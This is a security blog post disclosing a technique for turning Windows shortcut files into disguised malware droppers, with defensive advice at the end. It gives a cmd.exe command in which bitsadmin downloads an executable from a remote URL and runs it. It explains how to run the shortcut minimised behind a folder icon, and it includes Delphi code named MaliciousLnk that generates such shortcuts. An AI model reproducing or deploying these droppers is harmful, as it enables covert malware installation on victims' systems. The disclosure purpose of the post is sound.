Our security researcher and Lead Developer (@DarkCoderSc) came across a way of installing malware threats in a Microsoft Windows Operating System using the well-known Shortcut System that nearly everybody uses and blindly trusts.
Because of it's very nature, it is quite hard to detect. Removal might even be more difficult.
To describe this threat, we shall first describe a native Windows program, called BITSAdmin Tool and which is embedded in Windows since Windows XP SP2. Follow this MSDN link for more information about how to use it and what it is used for.
Basically, this command line tool was designed to create download tasks and to monitor their progress. Offering such command line is very dangerous since
Bitsadmin.exe is of course signed by Microsoft and
and approved by other antivirus software, and can be used in a single command line.
bitsadmin /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe
Now let’s use this command line tool to exploit a new Windows Shortcut.
Right click somewhere in your explorer (for example a free space on your desktop), then click 'Create a new shortcut'
cmd.exe /C "%windir%\System32\bitsadmin.exe /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe & %temp%\setup.exe"
Then save it.
Now right click on shortcut, then select Properties.
Switch the 'Run' option to 'Run Minimized'
Finally update the icon with your favorite one (for example a folder icon)
To keep the icon when you share the shortcut, it is recommended to keep shell32.dll as target for icons (since shell32.dll is natively available in any Windows System).
Note: Not only shell32.dll contains icons in a Microsoft System:
Ieframe.dll, imageres.dll, pnidui.dll, wmploc.dll etc. also have many useful icons.
uses ActiveX, ShlObj, ComObj; function MaliciousLnk(fileUrl, destFile : String) : Boolean; var cObject : IUnknown; shellLink : IShellLink; PFile : IPersistFile; LinkName : string; Cmd : String; begin result := false; CoInitialize(nil); try cObject := CreateComObject(CLSID_ShellLink); shellLink := cObject as IShellLink; PFile := cObject as IPersistFile; Cmd := '/C "c:\windows\system32\bitsadmin.exe /transfer downloader /priority normal "' + fileURL + '" %temp%\tmp.exe & %temp%\tmp.exe"'; shellLink.SetDescription('www.phrozensoft.com'); shellLink.SetPath('cmd.exe'); shellLink.SetArguments(PWideChar(cmd)); shellLink.SetShowCmd(SW_SHOWMINNOACTIVE); shellLink.SetWorkingDirectory('%windir%\system32\'); shellLink.SetIconLocation('shell32.dll', 1); result := PFile.Save(PWideChar(destFile), false) = S_OK; finally CoUninitialize(); end; end;
bitsadmin.exe is just an example of what you can do using Windows shortcut, basically you can do any possible malicious things you could do through command lines like:
Note: For regular Windows users who don’t need to use PowerShell (by default enabled), we recommend to uninstall the package. This would mitigate all malware that exploits PowerShell to install malicious codes.
Go to Program and Features utility (Native Windows Uninstaller Window) and click on Turn Windows features on or off
Scroll down to the PowerShell list item, then uncheck the checkbox
Never blindly trust shortcuts you encounter. They might hide the presence of a malicious code which can be undetected by your favourite antivirus software. The end result might even be a compromised or locked system.
Take the time to open the properties of an unknown shortcut and see which command line it would try to execute.
If you have any doubt, remove it!